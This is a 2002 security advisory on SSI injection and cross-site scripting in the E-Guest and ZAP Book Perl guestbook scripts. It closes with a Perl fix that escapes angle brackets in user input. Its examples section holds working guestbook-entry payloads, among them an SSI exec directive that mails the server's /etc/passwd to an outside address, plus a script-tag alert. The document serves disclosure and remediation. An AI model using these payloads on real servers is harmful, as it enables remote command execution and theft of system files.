SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)

[DownBload <downbload () hotmail com>]

              [ DownBload Security Research Lab Advisory ]
[-------------------------------------------------------------------------]
Advisory name: SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)
Advisory number: 6
Application: E-Guest (1.1) & ZAP Book (v1.0.3) (CGI scripts)
---[ E-Guest 
Author: Leung Eric
E-mail: cgi () leungeric com
Homepage: http://leungeric.com
Working demo: http://leungeric.com/eric/demo/E-Guest_sign.pl
---[ ZAP Book
Author: Sephiroth32
E-mail: sephiroth32 () unitedff com
Homepage: http://www.unitedff.com

Date: 28.06.2002
Impact: remote user can execute shell commands & cross site scripting 
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload                                                
Mail me @: downbload () hotmail com     




======[ Overview        
    
--[ E-Guest is "...full feature guestbook written in Perl...". 
    Maybe little too much 'full feature' ;).
--[ ZAP Book is guestbook too, but it is more advanced than E-Guest.




======[ Problem         

It looks that it is very hard to find secure guestbook. ;).
--[ E-Guest author wrote - "HTML tag filtering". That is true, but only
    'comment' is filtered, and there is still name, email, homepage and
    location, where we can put our nasty SSI or CSS code. 
--[ ZAP Book is different animal. In ZAP Book, almost everything is 
    filtered. Exception is 'post' variable, which contains user comment, 
    so again, we can put our nasty SSI or CSS code in 'post' variable.




======[ Examples

---[ E-Guest

SSI attack
~~~~~~~~~~
Full Name: HI<!--#exec cmd="/bin/mail downbload () hotmail com < /etc/passwd"-
->
E-mail: downbload () hotmail com
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just SSI attack.

CSS attack
~~~~~~~~~~
Full Name: HI&lt;script&gt;javascript:alert('HACKED BY DOWNBLOAD');&lt;/script&gt;
E-mail: downbload () hotmail com
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just CSS attack.


---[ ZAP Book

SSI attack
~~~~~~~~~~
Name: DownBload
Email: downbload () hotmail com
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by: Search Engine
Entry: SSI attack <!--#exec cmd="/bin/mail downbload () hotmail com 
< /etc/passwd"-->

CSS attack
~~~~~~~~~~
Name: DownBload
Email: downbload () hotmail com
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by: Search Engine
Entry: CSS attack &lt;script&gt;javascript:alert('HACKED BY DOWNBLOAD');&lt;/script&gt;




======[ Solution 

As i said in 'Makebook advisory', solution for SSI & CSS attack is 
filtering 
special characters from user input. 

---[ E-Guest
FIX: Add next code to E-Guest_sign.pl (or wait for fixed version :-):
...
$fullname =~ s/</&lt;/g;
$fullname =~ s/>/&gt;/g;

$email =~ s/</&lt;/g;
$email =~ s/>/&gt;/g;

$homepage =~ s/</&lt;/g;
$homepage =~ s/>/&gt;/g;

$uin =~ s/</&lt;/g;
$uin =~ s/>/&gt;/g;

$location =~ s/</&lt;/g;
$location =~ s/>/&gt;/g;
...


---[ ZAP Book
FIX: Add next code to addentry.cgi (or wait for fixed version :-):
...
$in{'post'} =~ s/</&lt;/g;
$in{'post'} =~ s/>/&gt;/g;
...




======[ Greetz

Greetz goes to #hr.hackers <irc.carnet.hr>. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis, 
Fr1c, harlequin, Astral and www.active-security.org.
Special shitz goes to: DarkMan from crohack a.k.a darkforum, and his 
stupid friend h4x0r.